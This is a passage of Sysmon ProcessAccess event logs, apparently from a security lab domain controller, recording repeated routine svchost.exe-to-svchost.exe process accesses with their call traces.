C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:56.672\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:56.672","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 